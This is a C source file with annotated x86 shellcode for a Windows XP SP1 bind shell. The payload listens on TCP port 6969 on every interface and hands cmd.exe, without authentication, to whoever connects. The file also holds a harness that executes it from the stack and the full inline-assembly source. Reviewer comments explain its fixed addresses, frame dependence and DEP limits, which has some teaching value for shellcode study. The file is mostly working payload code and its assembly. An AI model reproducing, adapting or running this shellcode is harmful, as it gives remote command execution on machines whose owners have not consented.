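/*
 * Windows XP SP1 bind shell
 * by xoclipse  xoclipse@cox.net  http://xoclipse.fraghosts.net
 *
 * Shellcode written as a learning exercise in shellcode writing and x86
 * assembly.  The payload binds TCP port 6969, waits for one client to
 * connect, then CreateProcess()es cmd.exe with stdin, stdout and stderr
 * redirected to the accepted socket.  Run the program and connect to
 * port 6969 with telnet to get a shell.
 *
 * NOTE(review): the payload is not self-contained, position-independent
 * shellcode.  It only works under the conditions spelled out by the
 * reference source at the bottom of this file:
 *   - GetProcAddress (0x77e7b332) and LoadLibraryA (0x77e7d961) are
 *     hard-coded kernel32 addresses for XP SP1.  The reference source
 *     lists 0x77e7a5fd as the GetProcAddress address for another XP
 *     build; no other OS version is covered.
 *   - The payload addresses every string and variable as [ebp-N]
 *     relative to the frame pointer it is entered with (main's), after
 *     a `sub ebp, 4` in its prologue.  vars_and_strings below is that
 *     frame image, so the compiler must place it exactly where the
 *     `//ebp-N` annotations say.  An optimizing build or a different
 *     compiler can move it, and the payload then dereferences garbage.
 *   - shellcode[] is a stack array, so the call into it needs an
 *     executable stack.  With DEP/NX (XP SP2 and later) the call faults.
 * NOTE(review): the bound address is the dword 0x391b0002 followed by
 * three zero dwords, i.e. {AF_INET, htons(6969), INADDR_ANY, sin_zero}.
 * The listener is therefore reachable from every interface, not only
 * localhost, and whoever connects first gets cmd.exe with this process's
 * privileges and no authentication.  Run it only on an isolated host.
 */
#include <stdio.h>   /* NOTE(review): the header name was lost when this
                        listing was extracted.  main() itself makes no
                        library calls, so any standard header (or none)
                        is enough for the harness. */

/*
 * Harness: lay the payload's variables out on the stack, then the payload
 * bytes, then jump into the payload.  Does not return on success: the
 * payload ends in ExitProcess(0).
 */
int main(void)
{
    /*
     * Frame image read by the payload, lowest address first.  Each piece
     * is labelled with the `//ebp-N` offset the payload uses for it (see
     * the reference source at the bottom).  0xCC bytes are padding that is
     * never read; 0xFFFFFFFF slots are handles the payload fills in at run
     * time.  The total is 260 bytes (ebp-260 .. ebp-1); the string's
     * implicit terminating NUL is a 261st byte the payload never touches.
     */
    unsigned char vars_and_strings[] =
        "\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x00"              /* ebp-260: "ExitProcess"    */
        "\xCC\xCC\xCC"                                                       /*          pad to 16        */
        "\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64\x6C\x6C\x00\x00"          /* ebp-244: "kernel32.dll"   */
        "\xCC\xCC"                                                           /*          pad to 16        */
        "\xFF\xFF\xFF\xFF"                                                   /* ebp-228: kernel32 handle  */
        /* ebp-224: STARTUPINFO (68 bytes, zeroed by the payload's memset)
         * ebp-156: PROCESS_INFORMATION (16 bytes)
         * 84 bytes of filler in total; the count is what keeps
         * "CreateProcessA" at ebp-140. */
        "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
        "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
        "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
        "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
        "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
        "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
        "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
        "\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x41\x00\x00"  /* ebp-140: "CreateProcessA" */
        "\x61\x63\x63\x65\x70\x74\x00\x00"                                   /* ebp-124: "accept"         */
        "\x6C\x69\x73\x74\x65\x6E\x00\x00"                                   /* ebp-116: "listen"         */
        "\x6D\x65\x6D\x73\x65\x74\x00\x00"                                   /* ebp-108: "memset"         */
        "\x62\x69\x6E\x64\x00\x00\xCC\xCC"                                   /* ebp-100: "bind" + pad     */
        "\xFF\xFF\xFF\xFF"                                                   /* ebp-92:  sockfd           */
        "\x57\x53\x41\x53\x6F\x63\x6B\x65\x74\x41\x00\x00"                  /* ebp-88:  "WSASocketA"     */
        "\x32\xB3\xE7\x77"                                                   /* ebp-76:  GetProcAddress = 0x77e7b332 (XP SP1) */
        "\x61\xD9\xE7\x77"                                                   /* ebp-72:  LoadLibraryA   = 0x77e7d961 (XP SP1) */
        "\xFF\xFF\xFF\xFF"                                                   /* ebp-68:  msvcrt handle    */
        "\xFF\xFF\xFF\xFF"                                                   /* ebp-64:  ws2_32 handle    */
        "\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x00\x00"                  /* ebp-60:  "WSAStartup"     */
        "\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x00\xCC\xCC"  /* ebp-48:  "LoadLibraryA" + pad */
        "\x6D\x73\x76\x63\x72\x74\x2E\x64\x6C\x6C\x00\x00"                  /* ebp-32:  "msvcrt.dll"     */
        "\x77\x73\x32\x5F\x33\x32\x2E\x64\x6C\x6C\x00\x00"                  /* ebp-20:  "ws2_32.dll"     */
        "\x63\x6D\x64\x2E\x65\x78\x65\x00";                                  /* ebp-8:   "cmd.exe"        */

    /*
     * The payload.  Byte-for-byte the assembly from the reference source at
     * the bottom; each line is annotated with the instruction it encodes so
     * the two can be checked against each other.  All [ebp-N] references
     * are into vars_and_strings above.
     */
    unsigned char shellcode[] =
        "\xE9\x34\x01\x00\x00"                  /* jmp  start                                    */
        /* startWinsockAndListen: */
        "\x8B\x45\xB4"                          /* mov  eax, [ebp-76]    ; GetProcAddress        */
        "\x8D\x55\xC4"                          /* lea  edx, [ebp-60]    ; "WSAStartup"          */
        "\x52"                                  /* push edx                                      */
        "\xFF\x75\xC0"                          /* push [ebp-64]         ; ws2_32 handle         */
        "\xFF\xD0"                              /* call eax                                      */
        "\x81\xEC\x90\x01\x00\x00"              /* sub  esp, 400         ; scratch for WSADATA   */
        "\x54"                                  /* push esp                                      */
        "\x68\x01\x01\x00\x00"                  /* push 0x101            ; MAKEWORD(1,1)         */
        "\xFF\xD0"                              /* call eax              ; WSAStartup            */
        "\x81\xC4\x90\x01\x00\x00"              /* add  esp, 400                                 */
        "\x8B\x45\xB4"                          /* mov  eax, [ebp-76]                            */
        "\x8D\x55\xA8"                          /* lea  edx, [ebp-88]    ; "WSASocketA"          */
        "\x52\xFF\x75\xC0\xFF\xD0"              /* push edx / push [ebp-64] / call eax           */
        "\x6A\x00\x6A\x00\x6A\x00"              /* push 0, 0, 0                                  */
        "\x6A\x06\x6A\x01\x6A\x02"              /* push IPPROTO_TCP, SOCK_STREAM, PF_INET        */
        "\xFF\xD0"                              /* call eax              ; WSASocketA            */
        "\x89\x45\xA4"                          /* mov  [ebp-92], eax    ; sockfd                */
        "\x8B\x45\xB4"                          /* mov  eax, [ebp-76]                            */
        "\x8D\x55\x9C"                          /* lea  edx, [ebp-100]   ; "bind"                */
        "\x52\xFF\x75\xC0\xFF\xD0"              /* push edx / push [ebp-64] / call eax           */
        "\x6A\x00\x6A\x00\x6A\x00"              /* push 0, 0, 0          ; sin_zero, INADDR_ANY  */
        "\x68\x02\x00\x1B\x39"                  /* push 0x391B0002       ; AF_INET, htons(6969)  */
        "\x8B\xCC"                              /* mov  ecx, esp         ; &sockaddr_in          */
        "\x6A\x10"                              /* push 16                                       */
        "\x51"                                  /* push ecx                                      */
        "\xFF\x75\xA4"                          /* push [ebp-92]                                 */
        "\xFF\xD0"                              /* call eax              ; bind                  */
        "\x83\xC4\x10"                          /* add  esp, 16          ; drop the sockaddr_in  */
        "\x8B\x45\xB4"                          /* mov  eax, [ebp-76]                            */
        "\x8D\x55\x8C"                          /* lea  edx, [ebp-116]   ; "listen"              */
        "\x52\xFF\x75\xC0\xFF\xD0"              /* push edx / push [ebp-64] / call eax           */
        "\x6A\x01"                              /* push 1                ; backlog               */
        "\xFF\x75\xA4"                          /* push [ebp-92]                                 */
        "\xFF\xD0"                              /* call eax              ; listen                */
        "\x8B\x45\xB4"                          /* mov  eax, [ebp-76]                            */
        "\x8D\x55\x84"                          /* lea  edx, [ebp-124]   ; "accept"              */
        "\x52\xFF\x75\xC0\xFF\xD0"              /* push edx / push [ebp-64] / call eax           */
        "\x6A\x00\x6A\x00"                      /* push 0, 0                                     */
        "\xFF\x75\xA4"                          /* push [ebp-92]                                 */
        "\xFF\xD0"                              /* call eax              ; accept                */
        "\x89\x45\xA4"                          /* mov  [ebp-92], eax    ; client socket (listener handle is dropped) */
        "\x8B\x45\xB4"                          /* mov  eax, [ebp-76]                            */
        "\x8D\x55\x94"                          /* lea  edx, [ebp-108]   ; "memset"              */
        "\x52"                                  /* push edx                                      */
        "\xFF\x75\xBC"                          /* push [ebp-68]         ; msvcrt handle         */
        "\xFF\xD0"                              /* call eax                                      */
        "\x8D\x9D\x20\xFF\xFF\xFF"              /* lea  ebx, [ebp-224]   ; &STARTUPINFO          */
        "\x6A\x44\x6A\x00\x53"                  /* push 68, 0, ebx                               */
        "\xFF\xD0"                              /* call eax              ; memset                */
        "\x83\xC4\x0C"                          /* add  esp, 12          ; memset is cdecl       */
        "\xC7\x03\x44\x00\x00\x00"              /* mov  dword [ebx], 68  ; si.cb                 */
        "\xC7\x43\x2D\x01\x00\x00\x00"          /* mov  dword [ebx+45], 1 ; see note in reference source: yields dwFlags = 0x100 */
        "\x8B\x4D\xA4"                          /* mov  ecx, [ebp-92]                            */
        "\x89\x4B\x38\x89\x4B\x3C\x89\x4B\x40"  /* hStdInput/hStdOutput/hStdError = client socket */
        "\x8B\x45\xB4"                          /* mov  eax, [ebp-76]                            */
        "\x8D\x95\x74\xFF\xFF\xFF"              /* lea  edx, [ebp-140]   ; "CreateProcessA"      */
        "\x52"                                  /* push edx                                      */
        "\xFF\xB5\x1C\xFF\xFF\xFF"              /* push [ebp-228]        ; kernel32 handle       */
        "\xFF\xD0"                              /* call eax                                      */
        "\x8D\x8D\x64\xFF\xFF\xFF"              /* lea  ecx, [ebp-156]   ; &PROCESS_INFORMATION  */
        "\x8D\x55\xF8"                          /* lea  edx, [ebp-8]     ; "cmd.exe"             */
        "\x51\x53"                              /* push ecx, ebx         ; &pi, &si              */
        "\x6A\x00\x6A\x00"                      /* push 0, 0             ; cwd, environment      */
        "\x68\x00\x00\x00\x08"                  /* push 0x08000000       ; CREATE_NO_WINDOW      */
        "\x6A\x01"                              /* push 1                ; bInheritHandles       */
        "\x6A\x00\x6A\x00"                      /* push 0, 0             ; thread/process attrs  */
        "\x52"                                  /* push edx              ; command line          */
        "\x6A\x00"                              /* push 0                ; application name      */
        "\xFF\xD0"                              /* call eax              ; CreateProcessA        */
        "\x8B\x45\xB4"                          /* mov  eax, [ebp-76]                            */
        "\x8D\x95\xFC\xFE\xFF\xFF"              /* lea  edx, [ebp-260]   ; "ExitProcess"         */
        "\x52"                                  /* push edx                                      */
        "\xFF\xB5\x1C\xFF\xFF\xFF"              /* push [ebp-228]                                */
        "\xFF\xD0"                              /* call eax                                      */
        "\x6A\x00\xFF\xD0"                      /* push 0 / call eax     ; ExitProcess(0)        */
        "\xC3"                                  /* ret                   ; not reached           */
        /* loadLibraries: */
        "\x8B\x45\xB8"                          /* mov  eax, [ebp-72]    ; LoadLibraryA          */
        "\x8D\x55\xEC"                          /* lea  edx, [ebp-20]    ; "ws2_32.dll"          */
        "\x52\xFF\xD0"                          /* push edx / call eax                           */
        "\x89\x45\xC0"                          /* mov  [ebp-64], eax                            */
        "\x8B\x45\xB8"                          /* mov  eax, [ebp-72]                            */
        "\x8D\x55\xE0"                          /* lea  edx, [ebp-32]    ; "msvcrt.dll"          */
        "\x52\xFF\xD0"                          /* push edx / call eax                           */
        "\x89\x45\xBC"                          /* mov  [ebp-68], eax                            */
        "\x8B\x45\xB8"                          /* mov  eax, [ebp-72]                            */
        "\x8D\x95\x0C\xFF\xFF\xFF"              /* lea  edx, [ebp-244]   ; "kernel32.dll"        */
        "\x52\xFF\xD0"                          /* push edx / call eax                           */
        "\x89\x85\x1C\xFF\xFF\xFF"              /* mov  [ebp-228], eax                           */
        "\xC3"                                  /* ret                                           */
        /* start: */
        "\x55"                                  /* push ebp                                      */
        "\x83\xED\x04"                          /* sub  ebp, 4           ; base for the [ebp-N] frame image */
        "\xE8\xCC\xFF\xFF\xFF"                  /* call loadLibraries                            */
        "\xE8\xBE\xFE\xFF\xFF"                  /* call startWinsockAndListen                    */
        "\xEB\x00"                              /* jmp  end                                      */
        "\x5D";                                 /* pop  ebp              ; not reached           */

    /*
     * Jump into the payload.  This relies on ebp still being main's frame
     * pointer at the call, on vars_and_strings sitting at the offsets the
     * payload expects below it, and on the stack being executable.
     */
    ((void (*)(void))(void *)shellcode)();
    return 0;   /* not reached: the payload calls ExitProcess(0) */
}

/*
 * Reference source the payload bytes were assembled from (MSVC, 32-bit
 * inline assembly; PROCESS_INFORMATION and STARTUPINFO come from
 * <windows.h>).  The `//ebp-N` annotations are the frame offsets the
 * shellcode above is hard-wired to; vars_and_strings in main() is this set
 * of locals laid out as one byte string, lowest address first.
 *
 * char stuff[]      = "cmd.exe\0";              //ebp-8
 * char stuff1[]     = "ws2_32.dll\0";           //ebp-20
 * char stuff2[]     = "msvcrt.dll\0";           //ebp-32
 * char loadlib[]    = "LoadLibraryA\0";         //ebp-48
 * char wsastartup[] = "WSAStartup\0";           //ebp-60
 * unsigned int winsockhandle   = 0xffffffff;    //ebp-64
 * unsigned int msvcrthandle    = 0xffffffff;    //ebp-68
 * unsigned int loadlibaddy     = 0x77e7d961;    //ebp-72
 * unsigned int getproc_address = 0x77e7b332;    //ebp-76
 *                                               //0x77e7b332 xp sp1
 *                                               //0x77e7a5fd xp
 * char wsasocket[]  = "WSASocketA\0";           //ebp-88
 * unsigned int sockfd          = 0xffffffff;    //ebp-92
 * char bindit[]     = "bind\0";                 //ebp-100
 * char memset1[]    = "memset\0";               //ebp-108
 * char listen1[]    = "listen\0";               //ebp-116
 * char accept1[]    = "accept\0";               //ebp-124
 * char createproc[] = "CreateProcessA\0";       //ebp-140
 * PROCESS_INFORMATION proc_info;                //ebp-156
 * STARTUPINFO start_info;                       //ebp-224
 * unsigned int kernel32handle  = 0xffffffff;    //ebp-228
 * char kernel321[]  = "kernel32.dll\0";         //ebp-244
 * char exitproc[]   = "ExitProcess\0";          //ebp-260
 *
 * _asm {
 *         jmp     start
 *
 * startWinsockAndListen:
 *         ; ---------------- WSAStartup ----------------------
 *         ; GetProcAddress of WSAStartup, address goes into eax
 *         mov     eax, dword ptr[ebp-76]
 *         lea     edx, dword ptr[ebp-60]
 *         push    edx
 *         push    dword ptr[ebp-64]
 *         call    eax
 *         ; WSAStartup(MAKEWORD(1,1), &wsad)
 *         sub     esp, 400                ; scratch space for the WSADATA
 *         push    esp
 *         push    00000101h
 *         call    eax
 *         add     esp, 400
 *
 *         ; ---------------- WSASocket -------------------------
 *         ; GetProcAddress of WSASocket, address goes into eax
 *         mov     eax, dword ptr[ebp-76]
 *         lea     edx, dword ptr[ebp-88]
 *         push    edx
 *         push    dword ptr[ebp-64]
 *         call    eax
 *         ; WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0)
 *         push    0
 *         push    0
 *         push    0
 *         push    6                       ; IPPROTO_TCP
 *         push    1                       ; SOCK_STREAM
 *         push    2                       ; PF_INET
 *         call    eax
 *         mov     dword ptr[ebp-92], eax
 *
 *         ; ------------------ bind ------------------------------
 *         ; GetProcAddress of bind, address goes into eax
 *         mov     eax, dword ptr[ebp-76]
 *         lea     edx, dword ptr[ebp-100]
 *         push    edx
 *         push    dword ptr[ebp-64]
 *         call    eax
 *         ; bind(sockfd, (struct sockaddr*)&addr, sizeof(struct sockaddr_in))
 *         ; NOTE(review): the four pushes build the sockaddr_in on the stack:
 *         ; sin_zero (8 bytes), sin_addr = 0 = INADDR_ANY, then
 *         ; sin_family = AF_INET with sin_port = 1B39h = htons(6969).
 *         ; INADDR_ANY means every interface, not just localhost.
 *         push    00000000h
 *         push    0
 *         push    0
 *         push    391b0002h
 *         mov     ecx, esp
 *         push    16
 *         push    ecx
 *         push    dword ptr[ebp-92]
 *         call    eax
 *         add     esp, 16
 *
 *         ; ------------------ listen ----------------------------
 *         ; GetProcAddress of listen, address goes into eax
 *         mov     eax, dword ptr[ebp-76]
 *         lea     edx, dword ptr[ebp-116]
 *         push    edx
 *         push    dword ptr[ebp-64]
 *         call    eax
 *         ; listen(sockfd, 1)
 *         push    00000001
 *         push    dword ptr[ebp-92]
 *         call    eax
 *
 *         ; ------------------ accept ----------------------------
 *         ; GetProcAddress of accept, address goes into eax
 *         mov     eax, dword ptr[ebp-76]
 *         lea     edx, dword ptr[ebp-124]
 *         push    edx
 *         push    dword ptr[ebp-64]
 *         call    eax
 *         ; accept(sockfd, 0, 0)
 *         push    00000000
 *         push    00000000
 *         push    dword ptr[ebp-92]
 *         call    eax
 *         ; NOTE(review): the accepted client socket replaces the listening
 *         ; socket in sockfd; the listener is never closed (the process exits
 *         ; via ExitProcess below, so it is only a leak, not a bug).
 *         mov     dword ptr[ebp-92], eax
 *
 *         ; ------------------- memset and fill in STARTUPINFO structure -----------------------------
 *         ; GetProcAddress of memset, address goes into eax
 *         mov     eax, dword ptr[ebp-76]
 *         lea     edx, dword ptr[ebp-108]
 *         push    edx
 *         push    dword ptr[ebp-68]
 *         call    eax
 *         ; memset(&start_info, 0, sizeof(STARTUPINFO));
 *         lea     ebx, dword ptr[ebp-224]
 *         push    68
 *         push    0
 *         push    ebx
 *         call    eax
 *         add     esp, 12                 ; memset is cdecl: caller cleans up
 *         ; fill startup info structure
 *         mov     dword ptr[ebx], 00000044h      ; sizeof(STARTUPINFO)
 *         ; NOTE(review): dwFlags is at offset 44, not 45.  This misaligned
 *         ; dword store puts the 01 byte at offset 45, so dwFlags reads as
 *         ; 00000100h = STARTF_USESTDHANDLES and the high byte of wShowWindow
 *         ; stays 0.  The result is what "use std handles" needs, but it only
 *         ; works because the structure was just zeroed and x86 is
 *         ; little-endian; `mov dword ptr[ebx+44], 00000100h` says it plainly.
 *         mov     dword ptr[ebx+45], 00000001h   ; use std handles
 *         mov     ecx, dword ptr[ebp-92]
 *         mov     dword ptr[ebx+56], ecx         ; client handles: hStdInput
 *         mov     dword ptr[ebx+60], ecx         ;                 hStdOutput
 *         mov     dword ptr[ebx+64], ecx         ;                 hStdError
 *
 *         ;--------------------- CreateProcess ----------------------------------
 *         ; GetProcAddress of CreateProcess
 *         mov     eax, dword ptr[ebp-76]
 *         lea     edx, dword ptr[ebp-140]
 *         push    edx
 *         push    dword ptr[ebp-228]
 *         call    eax
 *         ; CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &si, ?);
 *         lea     ecx, dword ptr[ebp-156] ; address of processinfo
 *         lea     edx, dword ptr[ebp-8]
 *         push    ecx
 *         push    ebx
 *         push    00000000
 *         push    00000000
 *         push    08000000h               ; make it have no window (CREATE_NO_WINDOW)
 *         push    00000001                ; bInheritHandles, so the socket reaches cmd.exe
 *         push    00000000
 *         push    00000000
 *         push    edx
 *         push    00000000
 *         call    eax
 *
 *         ;------------------------ ExitProcess -------------------------------
 *         ; GetProcAddress of ExitProcess
 *         mov     eax, dword ptr[ebp-76]
 *         lea     edx, dword ptr[ebp-260]
 *         push    edx
 *         push    dword ptr[ebp-228]
 *         call    eax
 *         push    0
 *         call    eax
 *         ret
 *
 * loadLibraries:
 *         ; LoadLibrary("ws2_32.dll")
 *         mov     eax, dword ptr[ebp-72]
 *         lea     edx, dword ptr[ebp-20]
 *         push    edx
 *         call    eax
 *         mov     dword ptr[ebp-64], eax
 *         ; LoadLibrary("msvcrt.dll")
 *         mov     eax, dword ptr[ebp-72]
 *         lea     edx, dword ptr[ebp-32]
 *         push    edx
 *         call    eax
 *         mov     dword ptr[ebp-68], eax
 *         ; LoadLibrary("kernel32.dll")
 *         mov     eax, dword ptr[ebp-72]
 *         lea     edx, dword ptr[ebp-244]
 *         push    edx
 *         call    eax
 *         mov     dword ptr[ebp-228], eax
 *         ret
 *
 * start:
 *         push    ebp
 *         ;mov     ebp, esp               ; put stack pointer into ebp
 *         sub     ebp, 4                  ; get to beginning of variables
 *         ; NOTE(review): ebp is still the caller's frame pointer here, so
 *         ; every [ebp-N] above is relative to the frame the payload was
 *         ; called from, not to the payload's own stack.
 *         ; start loading libraries
 *         call    loadLibraries
 *         ; start winsock and listen
 *         call    startWinsockAndListen
 *         jmp     end                     ; finish it
 * end:
 *         ;add     esp, 150               ; restore esp to original
 *         pop     ebp
 * }
 */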